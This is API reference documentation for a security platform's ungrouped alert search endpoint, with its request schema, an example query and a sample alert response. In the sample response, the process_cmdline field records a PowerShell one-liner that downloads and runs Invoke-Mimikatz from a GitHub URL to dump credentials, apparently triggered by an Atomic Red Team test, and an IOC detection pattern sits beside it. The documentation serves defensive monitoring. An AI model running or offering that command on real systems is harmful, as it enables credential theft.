Find alerts - Ungrouped

POST {{cb_url}}/api/alerts/v7/orgs/{{cb_org_key}}/alerts/_search

Searches the alerts of the organization identified by `{{cb_org_key}}` and returns the matching alerts ungrouped. Several related alert endpoints accept a similar request body schema, so the `criteria` and `exclusions` documented below can be reused across them. The request must be made with credentials that hold the permission listed under RBAC Permissions Required.

See Documentation

RBAC Permissions Required

Permission (.notation name) | Operation(s)
org.alerts | READ

Request Schema

{
  "query": "<string>",
  "time_range": {
    "start": "<dateTime>",
    "end": "<dateTime>",
    "range": "<string>"
  },
  "criteria": {
    "org_key": [
      "<string>"
    ],
    "id": [
      "<string>"
    ],
    "type": [
      "<string>"
    ],
    "backend_timestamp": {
      "start": "<dateTime>",
      "end": "<dateTime>",
      "range": "<string>"
    },
    "user_update_timestamp": {
      "start": "<dateTime>",
      "end": "<dateTime>",
      "range": "<string>"
    },
    "backend_update_timestamp": {
      "start": "<dateTime>",
      "end": "<dateTime>",
      "range": "<string>"
    },
    "detection_timestamp": {
      "start": "<dateTime>",
      "end": "<dateTime>",
      "range": "<string>"
    },
    "first_event_timestamp": {
      "start": "<dateTime>",
      "end": "<dateTime>",
      "range": "<string>"
    },
    "last_event_timestamp": {
      "start": "<dateTime>",
      "end": "<dateTime>",
      "range": "<string>"
    },
    "category": [
      "<string>"
    ],
    "minimum_severity": <integer>,
    "reason_code": [
      "<string>"
    ],
    "threat_id": [
      "<string>"
    ],
    "primary_event_id": [
      "<string>"
    ],
    "policy_applied": [
      "<string>"
    ],
    "run_state": [
      "<string>"
    ],
    "sensor_action": [
      "<string>"
    ],
    "workflow_status": [
      "<string>"
    ],
    "workflow_change_timestamp": {
      "start": "<dateTime>",
      "end": "<dateTime>",
      "range": "<string>"
    },
    "workflow_changed_by_type": [
      "<string>"
    ],
    "workflow_changed_by_autoclose_rule_id": [
      "<string>"
    ],
    "workflow_closure_reason": [
      "<string>"
    ],
    "determination_value": [
      "<string>"
    ],
    "determination_change_timestamp": {
      "start": "<dateTime>",
      "end": "<dateTime>",
      "range": "<string>"
    },
    "determination_changed_by_type": [
      "<string>"
    ],
    "tags": [
      "<string>"
    ],
    "alert_notes_present": <boolean>,
    "threat_notes_present": <boolean>,
    "device_id": [
      <long>
    ],
    "device_name": [
      "<string>"
    ],
    "device_uem_id": [
      "<string>"
    ],
    "device_policy": [
      "<string>"
    ],
    "device_policy_id": [
      <long>
    ],
    "device_target_value": [
      "<string>"
    ],
    "device_os": [
      "<string>"
    ],
    "device_os_version": [
      "<string>"
    ],
    "device_username": [
      "<string>"
    ],
    "device_location": [
      "<string>"
    ],
    "device_external_ip": [
      "<string>"
    ],
    "device_internal_ip": [
      "<string>"
    ],
    "rule_config_type": [
      "<string>"
    ],
    "rule_config_name": [
      "<string>"
    ],
    "rule_config_id": [
      "<string>"
    ],
    "rule_category_id": [
      "<string>"
    ],
    "rule_id": [
      "<string>"
    ],
    "process_guid": [
      "<string>"
    ],
    "process_pid": [
      <integer>
    ],
    "process_name": [
      "<string>"
    ],
    "process_sha256": [
      "<string>"
    ],
    "process_md5": [
      "<string>"
    ],
    "process_effective_reputation": [
      "<string>"
    ],
    "process_reputation": [
      "<string>"
    ],
    "process_cmdline": [
      "<string>"
    ],
    "process_username": [
      "<string>"
    ],
    "process_signatures_certificate_authority": [
      "<string>"
    ],
    "process_signatures_publisher": [
      "<string>"
    ],
    "parent_guid": [
      "<string>"
    ],
    "parent_pid": [
      <integer>
    ],
    "parent_name": [
      "<string>"
    ],
    "parent_sha256": [
      "<string>"
    ],
    "parent_md5": [
      "<string>"
    ],
    "parent_effective_reputation": [
      "<string>"
    ],
    "parent_reputation": [
      "ADWARE",
      "NOT_SUPPORTED"
    ],
    "parent_cmdline": [
      "<string>"
    ],
    "parent_username": [
      "<string>"
    ],
    "childproc_guid": [
      "<string>"
    ],
    "childproc_name": [
      "<string>"
    ],
    "childproc_sha256": [
      "<string>"
    ],
    "childproc_md5": [
      "<string>"
    ],
    "childproc_effective_reputation": [
      "<string>"
    ],
    "childproc_username": [
      "<string>"
    ],
    "childproc_cmdline": [
      "<string>"
    ],
    "netconn_remote_port": [
      <integer>
    ],
    "netconn_local_port": [
      <integer>
    ],
    "netconn_protocol": [
      "<string>"
    ],
    "netconn_remote_domain": [
      "<string>"
    ],
    "netconn_remote_ip": [
      "<string>"
    ],
    "netconn_local_ip": [
      "<string>"
    ],
    "netconn_remote_ipv4": [
      "<string>"
    ],
    "netconn_local_ipv4": [
      "<string>"
    ],
    "netconn_remote_ipv6": [
      "<string>"
    ],
    "netconn_local_ipv6": [
      "<string>"
    ],
    "threat_category": [
      "<string>"
    ],
    "ttps": [
      "<string>"
    ],
    "attack_tactic": [
      "<string>"
    ],
    "attack_technique": [
      "<string>"
    ],
    "report_id": [
      "<string>"
    ],
    "report_name": [
      "<string>"
    ],
    "report_link": [
      "<string>"
    ],
    "watchlists_id": [
      "<string>"
    ],
    "watchlists_name": [
      "<string>"
    ],
    "k8s_policy_id": [
      "<string>"
    ],
    "k8s_policy": [
      "<string>"
    ],
    "k8s_rule_id": [
      "<string>"
    ],
    "k8s_rule": [
      "<string>"
    ],
    "cluster_name": [
      "<string>"
    ],
    "namespace": [
      "<string>"
    ],
    "workload_kind": [
      "<string>"
    ],
    "workload_name": [
      "<string>"
    ],
    "replica_id": [
      "<string>"
    ],
    "connection_type": [
      "<string>"
    ],
    "egress_group_id": [
      "<string>"
    ],
    "egress_group_name": [
      "<string>"
    ],
    "ip_reputation": [
      <integer>
    ],
    "remote_is_private": <boolean>,
    "remote_namespace": [
      "<string>"
    ],
    "remote_replica_id": [
      "<string>"
    ],
    "remote_workload_kind": [
      "<string>"
    ],
    "remote_workload_name": [
      "<string>"
    ],
    "tms_rule_id": [
      "<string>"
    ],
    "threat_name": [
      "<string>"
    ],
    "vendor_name": [
      "<string>"
    ],
    "vendor_id": [
      "<string>"
    ],
    "product_name": [
      "<string>"
    ],
    "product_id": [
      "<string>"
    ],
    "external_device_friendly_name": [
      "<string>"
    ],
    "serial_number": [
      "<string>"
    ],
    "blocked_name": [
      "<string>"
    ],
    "blocked_sha256": [
      "<string>"
    ],
    "blocked_md5": [
      "<string>"
    ],
    "blocked_effective_reputation": [
      "<string>"
    ],
    "ml_classification_final_verdict": [
      "<string>"
    ],
    "ml_classification_global_prevalence": [
      "<string>"
    ],
    "ml_classification_org_prevalence": [
      "<string>"
    ],
    "mdr_alert": <boolean>,
    "mdr_workflow_status": [
      "<string>"
    ],
    "mdr_workflow_change_timestamp": {
      "start": "<dateTime>",
      "end": "<dateTime>",
      "range": "<string>"
    },
    "mdr_workflow_is_assigned": <boolean>,
    "mdr_determination_value": [
      "<string>"
    ],
    "mdr_determination_change_timestamp": {
      "start": "<dateTime>",
      "end": "<dateTime>",
      "range": "<string>"
    }
  },
  "exclusions": {
    "org_key": [
      "<string>"
    ],
    "id": [
      "<string>"
    ],
    "type": [
      "<string>"
    ],
    "backend_timestamp": {
      "start": "<dateTime>",
      "end": "<dateTime>",
      "range": "<string>"
    },
    "user_update_timestamp": {
      "start": "<dateTime>",
      "end": "<dateTime>",
      "range": "<string>"
    },
    "backend_update_timestamp": {
      "start": "<dateTime>",
      "end": "<dateTime>",
      "range": "<string>"
    },
    "detection_timestamp": {
      "start": "<dateTime>",
      "end": "<dateTime>",
      "range": "<string>"
    },
    "first_event_timestamp": {
      "start": "<dateTime>",
      "end": "<dateTime>",
      "range": "<string>"
    },
    "last_event_timestamp": {
      "start": "<dateTime>",
      "end": "<dateTime>",
      "range": "<string>"
    },
    "category": [
      "<string>"
    ],
    "minimum_severity": <integer>,
    "reason_code": [
      "<string>"
    ],
    "threat_id": [
      "<string>"
    ],
    "primary_event_id": [
      "<string>"
    ],
    "policy_applied": [
      "<string>"
    ],
    "run_state": [
      "<string>"
    ],
    "sensor_action": [
      "<string>"
    ],
    "workflow_status": [
      "<string>"
    ],
    "workflow_change_timestamp": {
      "start": "<dateTime>",
      "end": "<dateTime>",
      "range": "<string>"
    },
    "workflow_changed_by_type": [
      "<string>"
    ],
    "workflow_changed_by_autoclose_rule_id": [
      "<string>"
    ],
    "workflow_closure_reason": [
      "<string>"
    ],
    "determination_value": [
      "NONE"
    ],
    "determination_change_timestamp": {
      "start": "<dateTime>",
      "end": "<dateTime>",
      "range": "<string>"
    },
    "determination_changed_by_type": [
      "<string>"
    ],
    "tags": [
      "<string>"
    ],
    "alert_notes_present": <boolean>,
    "threat_notes_present": <boolean>,
    "device_id": [
      <long>
    ],
    "device_name": [
      "<string>"
    ],
    "device_uem_id": [
      "<string>"
    ],
    "device_policy": [
      "<string>"
    ],
    "device_policy_id": [
      <long>
    ],
    "device_target_value": [
      "<string>"
    ],
    "device_os": [
      "<string>"
    ],
    "device_os_version": [
      "<string>"
    ],
    "device_username": [
      "<string>"
    ],
    "device_location": [
      "<string>"
    ],
    "device_external_ip": [
      "<string>"
    ],
    "device_internal_ip": [
      "<string>"
    ],
    "rule_config_type": [
      "<string>"
    ],
    "rule_config_name": [
      "<string>"
    ],
    "rule_config_id": [
      "<string>"
    ],
    "rule_category_id": [
      "<string>"
    ],
    "rule_id": [
      "<string>"
    ],
    "process_guid": [
      "<string>"
    ],
    "process_pid": [
      <integer>
    ],
    "process_name": [
      "<string>"
    ],
    "process_sha256": [
      "<string>"
    ],
    "process_md5": [
      "<string>"
    ],
    "process_effective_reputation": [
      "<string>"
    ],
    "process_reputation": [
      "<string>"
    ],
    "process_cmdline": [
      "<string>"
    ],
    "process_username": [
      "<string>"
    ],
    "process_signatures_certificate_authority": [
      "<string>"
    ],
    "process_signatures_publisher": [
      "<string>"
    ],
    "parent_guid": [
      "<string>"
    ],
    "parent_pid": [
      <integer>
    ],
    "parent_name": [
      "<string>"
    ],
    "parent_sha256": [
      "<string>"
    ],
    "parent_md5": [
      "<string>"
    ],
    "parent_effective_reputation": [
      "<string>"
    ],
    "parent_reputation": [
      "<string>"
    ],
    "parent_cmdline": [
      "<string>"
    ],
    "parent_username": [
      "<string>"
    ],
    "childproc_guid": [
      "<string>"
    ],
    "childproc_name": [
      "<string>"
    ],
    "childproc_sha256": [
      "<string>"
    ],
    "childproc_md5": [
      "<string>"
    ],
    "childproc_effective_reputation": [
      "<string>"
    ],
    "childproc_username": [
      "<string>"
    ],
    "childproc_cmdline": [
      "<string>"
    ],
    "netconn_remote_port": [
      <integer>
    ],
    "netconn_local_port": [
      <integer>
    ],
    "netconn_protocol": [
      "<string>"
    ],
    "netconn_remote_domain": [
      "<string>"
    ],
    "netconn_remote_ip": [
      "<string>"
    ],
    "netconn_local_ip": [
      "<string>"
    ],
    "netconn_remote_ipv4": [
      "<string>"
    ],
    "netconn_local_ipv4": [
      "<string>"
    ],
    "netconn_remote_ipv6": [
      "<string>"
    ],
    "netconn_local_ipv6": [
      "<string>"
    ],
    "threat_category": [
      "<string>"
    ],
    "ttps": [
      "<string>"
    ],
    "attack_tactic": [
      "<string>"
    ],
    "attack_technique": [
      "<string>"
    ],
    "report_id": [
      "<string>"
    ],
    "report_name": [
      "<string>"
    ],
    "report_link": [
      "<string>"
    ],
    "watchlists_id": [
      "<string>"
    ],
    "watchlists_name": [
      "<string>"
    ],
    "k8s_policy_id": [
      "<string>"
    ],
    "k8s_policy": [
      "<string>"
    ],
    "k8s_rule_id": [
      "<string>"
    ],
    "k8s_rule": [
      "<string>"
    ],
    "cluster_name": [
      "<string>"
    ],
    "namespace": [
      "<string>"
    ],
    "workload_kind": [
      "<string>"
    ],
    "workload_name": [
      "<string>"
    ],
    "replica_id": [
      "<string>"
    ],
    "connection_type": [
      "<string>"
    ],
    "egress_group_id": [
      "<string>"
    ],
    "egress_group_name": [
      "<string>"
    ],
    "ip_reputation": [
      <integer>
    ],
    "remote_is_private": <boolean>,
    "remote_namespace": [
      "<string>"
    ],
    "remote_replica_id": [
      "<string>"
    ],
    "remote_workload_kind": [
      "<string>"
    ],
    "remote_workload_name": [
      "<string>"
    ],
    "tms_rule_id": [
      "<string>"
    ],
    "threat_name": [
      "<string>"
    ],
    "vendor_name": [
      "<string>"
    ],
    "vendor_id": [
      "<string>"
    ],
    "product_name": [
      "<string>"
    ],
    "product_id": [
      "<string>"
    ],
    "external_device_friendly_name": [
      "<string>"
    ],
    "serial_number": [
      "<string>"
    ],
    "blocked_name": [
      "<string>"
    ],
    "blocked_sha256": [
      "<string>"
    ],
    "blocked_md5": [
      "<string>"
    ],
    "blocked_effective_reputation": [
      "<string>"
    ],
    "ml_classification_final_verdict": [
      "<string>"
    ],
    "ml_classification_global_prevalence": [
      "<string>"
    ],
    "ml_classification_org_prevalence": [
      "<string>"
    ],
    "mdr_alert": <boolean>,
    "mdr_workflow_status": [
      "<string>"
    ],
    "mdr_workflow_change_timestamp": {
      "start": "<dateTime>",
      "end": "<dateTime>",
      "range": "<string>"
    },
    "mdr_workflow_is_assigned": <boolean>,
    "mdr_determination_value": [
      "<string>"
    ],
    "mdr_determination_change_timestamp": {
      "start": "<dateTime>",
      "end": "<dateTime>",
      "range": "<string>"
    }
  },
  "start": <long>,
  "rows": <long>,
  "sort": [
    {
      "field": "<string>",
      "order": "DESC"
    },
    {
      "field": "<string>",
      "order": "DESC"
    }
  ]
}


Request Body

{
  "time_range": {"range": "-2w"},
  "criteria": {"minimum_severity": 2, "device_os": ["WINDOWS"]},
  "exclusions": {"device_os_version": ["Windows 10 x64"], "threat_id": ["7103E507844087BE20351A50D8773029"]},
  "start": 1,
  "rows": 10,
  "sort": [{"field": "severity", "order": "DESC"}]
}

HEADERS

Key | Datatype | Required | Description
Content-Type | string | |
Accept | string | |

RESPONSES

status: OK (example response; one result shown). `num_found` reports the total number of matching alerts, while the smaller `num_available` (10000 vs 10995 here) suggests only that many can be retrieved by paging with `start`/`rows` — narrow `time_range` or `criteria` to reach the remainder. Results include device usernames, internal IP addresses and full process command lines, so stored responses should be treated as sensitive.

{
  "results": [
    {
      "org_key": "ABCD1234",
      "alert_url": "defense.conferdeploy.net/alerts?s[c][query_string]=id:1c3fa0b1-36fe-4641-9f87-95128bef94eb\u0026orgKey=ABCD1234",
      "id": "1c3fa0b1-36fe-4641-9f87-95128bef94eb",
      "type": "WATCHLIST",
      "backend_timestamp": "2023-08-06T13:33:47.411Z",
      "user_update_timestamp": null,
      "backend_update_timestamp": "2023-08-06T13:33:47.411Z",
      "detection_timestamp": "2023-08-06T13:32:59.205Z",
      "first_event_timestamp": "2023-08-06T13:30:17.713Z",
      "last_event_timestamp": "2023-08-06T13:30:17.713Z",
      "severity": 10,
      "reason": "Process powershell.exe was detected by the report \"Execution - AMSI - .Net Loading Suspicious Content Into Memory\" in watchlist \"AMSI Threat Intelligence\"",
      "reason_code": "0f6918d8-98c5-3ed9-9786-b8c6094eeb78:8c25935c-f78b-3ed3-b29e-4ce9c2a42ba0",
      "threat_id": "0F6918D898C58ED9D786B8C6094EEB78",
      "primary_event_id": "DHeFhEvUQCerOi2CvDbWUA-0",
      "policy_applied": "NOT_APPLIED",
      "run_state": "RAN",
      "sensor_action": "ALLOW",
      "workflow": {
        "change_timestamp": "2023-08-06T13:33:47.411Z",
        "changed_by_type": "SYSTEM",
        "changed_by": "ALERT_CREATION",
        "closure_reason": "NO_REASON",
        "status": "OPEN"
      },
      "determination": {
        "change_timestamp": "2023-08-06T13:33:47.411Z",
        "value": "NONE",
        "changed_by_type": null,
        "changed_by": null
      },
      "tags": null,
      "alert_notes_present": false,
      "threat_notes_present": false,
      "is_updated": false,
      "device_id": 1212123,
      "device_name": "demo_machine",
      "device_uem_id": "",
      "device_target_value": "MEDIUM",
      "device_policy": "default",
      "device_policy_id": 6525,
      "device_os": "WINDOWS",
      "device_os_version": "Windows Server 2019 x64",
      "device_username": "demo@demoorg.com",
      "device_location": "UNKNOWN",
      "device_external_ip": "1.2.3.4",
      "device_internal_ip": "5.6.7.8",
      "mdr_alert": false,
      "mdr_alert_notes_present": false,
      "mdr_threat_notes_present": false,
      "report_id": "LrKOC7DtQbm4g8w0UFruQg-5f8518fb-3981-44ce-8ab7-b4a4240d50e0",
      "report_name": "Execution - AMSI - .Net Loading Suspicious Content Into Memory",
      "report_description": "An attacker can leverage PowerShell's built-in abilities to access the .Net subsystem in Windows to load arbitrary code into memory. This is a common technique that is used to evade on-host AV scanning by never writing a file to disk and executing payloads directly in memory. You should take immediate action if responding to this alert.",
      "report_tags": ["evasion", "t1106", "t1059", "windows", "amsi", "attack", "attackframework"],
      "report_link": "https://attack.mitre.org/techniques/T1106/",
      "ioc_id": "5f8518fb-3981-44ce-8ab7-b4a4240d50e0",
      "ioc_hit": "fileless_scriptload_cmdline:\"[System.Runtime.InteropServices.Marshal]::Copy\" OR scriptload_content:\"[System.Runtime.InteropServices.Marshal]::Copy\"",
      "watchlists": [
        {
          "id": "Ci7w5B4URg6HN60hatQMQ",
          "name": "AMSI Threat Intelligence"
        }
      ],
      "process_guid": "ABCD1234-006a07ff-00000540-00000000-1d9c86a2286f3bc",
      "process_pid": 1344,
      "process_name": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe",
      "process_sha256": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
      "process_md5": "7353f60b1739074eb17c5f4dddefe239",
      "process_effective_reputation": "TRUSTED_WHITE_LIST",
      "process_reputation": "TRUSTED_WHITE_LIST",
      "process_cmdline": "\"powershell.exe\" \u0026 {IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds}",
      "process_username": "KOGNOS-W19-CB-3\\Administrator",
      "process_issuer": ["Microsoft Windows Production PCA 2011"],
      "process_publisher": ["Microsoft Windows"],
      "parent_guid": "ABCD1234-006a07ff-00000dbc-00000000-1d9c86a210c4ece",
      "parent_pid": 3516,
      "parent_name": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe",
      "parent_sha256": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
      "parent_md5": "7353f60b1739074eb17c5f4dddefe239",
      "parent_effective_reputation": "TRUSTED_WHITE_LIST",
      "parent_reputation": "TRUSTED_WHITE_LIST",
      "parent_cmdline": "\"c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe\" -c \"cd c:\\ ; echo MYPID=$PID; Get-Date ; Invoke-AtomicTest T1003.001-10 \"",
      "parent_username": "KOGNOS-W19-CB-3\\Administrator",
      "childproc_guid": "",
      "childproc_username": "",
      "childproc_cmdline": "",
      "ml_classification_final_verdict": "NOT_ANOMALOUS",
      "ml_classification_global_prevalence": "MEDIUM",
      "ml_classification_org_prevalence": "LOW"
    }
  ],
  "num_found": 10995,
  "num_available": 10000
}